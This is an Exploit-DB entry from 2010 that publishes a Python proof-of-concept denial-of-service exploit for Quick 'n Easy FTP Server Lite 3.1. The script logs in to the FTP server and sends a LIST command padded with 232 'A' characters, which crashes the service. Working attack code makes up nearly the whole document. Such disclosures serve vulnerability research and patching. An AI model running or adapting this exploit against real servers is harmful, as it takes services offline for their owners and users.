Quick 'n Easy FTP Server Lite 3.1 - Denial of Service

EDB-ID:

12853

CVE:

N/A

EDB Verified:

Author:

b0nd

Type:

dos

Exploit: /

Platform:

Windows

Date:

2010-06-03

Vulnerable App:

#!/usr/bin/python

print "\n############################################################"
print "##		 Team Hackers Garage			##"
print "##	Quick 'n Easy FTP Server Lite Version 3.1	##"
print "##		       Crash PoC			##"
print "##		 Sumit Sharma (aka b0nd)		##"
print "##		  sumit.iips@gmail.com			##"
print "##							##"
print "##	    Special Thanks to: Double_Zero		##"
print "##	(http://www.exploit-db.com/author/DouBle_Zer0)  ##"
print "##			   &				##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "############################################################"

# Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable 
# Tested on: Windows XP SP2
# ftp> ls AAAA... 232 A's...AAA?
# Server Crash!
# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
# No SEH overwrite
# No EIP overwrite


from socket import *

host = "172.12.128.4"		# Virtual Windows XP SP2
port = 21
user = "test"			# "upload" and "download" access
password = "test"


s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "LIST "
buffer += "A" * 232
buffer += "?"
buffer += "\r\n"

s.send(buffer)
print s.recv(1024)
s.close()
print "---->>> Server Crash!!!"

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services